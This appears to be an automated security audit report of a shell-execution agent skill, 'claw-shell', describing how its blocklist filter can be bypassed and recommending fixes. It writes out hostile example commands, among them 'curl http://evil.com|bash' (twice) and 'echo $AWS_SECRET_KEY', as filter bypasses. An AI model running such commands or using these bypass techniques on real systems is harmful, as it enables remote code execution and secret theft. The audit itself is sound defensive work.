Security Decision Report

claw-shell

Shell execution tool with declared purpose but weak safety filter that can be bypassed, allowing potentially destructive commands.

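Install decision first · Source: manual upload · Scan time: 2026/4/4
Files: 3
IOC: 1
Privilege overreach items: 0
Findings: 4
Most direct threat evidence
High risk · Code execution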
Unrestricted shell execution with weak safety controls

The skill uses execSync to execute arbitrary shell commands with only a basic blocklist filter. The filter in isDangerous() can be bypassed with variations like 'rmdir', uppercase commands, or piped remote scripts.

handler.js:18

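Why this conclusion was reached

1 of 4 dimensions triggered
Pass
Declared vs. actual capabilities

Declared resources and inferred capabilities are largely consistent.

Review
Hidden execution and outbound connections

1 general-risk artifact was extracted; it needs to be judged in context.

Block
Attack chains and high-risk findings

The report contains 0 attack-chain steps, plus 1 high-risk or critical finding.

Review
Dependency and supply-chain hygiene

Complete dependency information is not available, so the supply-chain assessment has to remain tentative.

How the risk score was raised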

Unrestricted shell execution via execSync +20

Full shell access is powerful and declared, but safety measures are minimal

Weak blocklist-based safety filter +15

Filter can be bypassed with variations like 'rmdir', symlinks, or 'curl http://evil.com|bash'

No timeout on execSync +8

Commands could hang or consume excessive resources

Single-character command variations bypass filter +5

'sudo' variations, 'DD' uppercase, embedded commands could slip through

Key evidence

High risk · Code execution

Unrestricted shell execution with weak safety controls

The skill uses execSync to execute arbitrary shell commands with only a basic blocklist filter. The filter in isDangerous() can be bypassed with variations like 'rmdir', uppercase commands, or piped remote scripts.

handler.js:18
Implement allowlist approach for commands or use more comprehensive validation. Add command timeouts and resource limits.
Medium risk · Code execution

Dangerous commands bypass filter

Commands like 'rmdir', 'chmod 777', '> file' redirection, or 'curl http://evil.com|bash' are not blocked by the current filter.

handler.js:18
Add coverage for more dangerous operations including file permissions, network downloads, and recursive deletion.
Medium risk · Sensitive access

Indirect environment variable access

While the skill does not explicitly access the environment, shell execution allows reading $API_KEY, $SECRET, etc. via commands like 'echo $AWS_SECRET_KEY'.

handler.js:14
Consider sanitizing commands that query environment variables or restrict to specific paths.
Low risk · Code execution

No command timeout configured

execSync calls have no timeout specified, allowing commands to hang indefinitely.

handler.js:29
Add timeout option to execSync calls.

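Declared vs. actual capabilities

Command execution: Pass
Declared: WRITE
Inferred: WRITE
execSync used in handler.js:1,7,10
File system: Pass
Declared: WRITE
Inferred: WRITE
Shell can execute any file operation
Network access: Pass
Declared: WRITE
Inferred: WRITE
Shell can execute curl/wget/netcat
Environment variables: Pass
Declared: NONE
Inferred: READ
Shell commands can read $ENV vars
Clipboard: Pass
Declared: NONE
Inferred: NONE
Browser: Pass
Declared: NONE
Inferred: NONE
Database: Pass
Declared: NONE
Inferred: NONE

Suspicious artifacts and outbound connections

Medium risk · External URL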
https://x.com/...

SKILL.md:39

Dependencies and supply chain

No structured dependency alerts.

File composition

3 files · 106 lines
JavaScript: 1 file · 57 lines; Markdown: 1 file · 44 lines; JSON: 1 file · 5 lines
Files needing attention · 2
handler.js JavaScript · 57 lines
Unrestricted shell execution with weak safety controls · Dangerous commands bypass filter · Indirect environment variable access · No command timeout configured
SKILL.md Markdown · 44 lines
https://x.com/...
Other files · _meta.json

Security highlights

Purpose and capabilities are clearly documented in SKILL.md
Uses dedicated tmux session 'claw' for isolation
Basic safety filter exists for clearly dangerous commands
No hidden functionality or obfuscation detected
No credential harvesting or data exfiltration observed
Single-purpose tool with focused functionality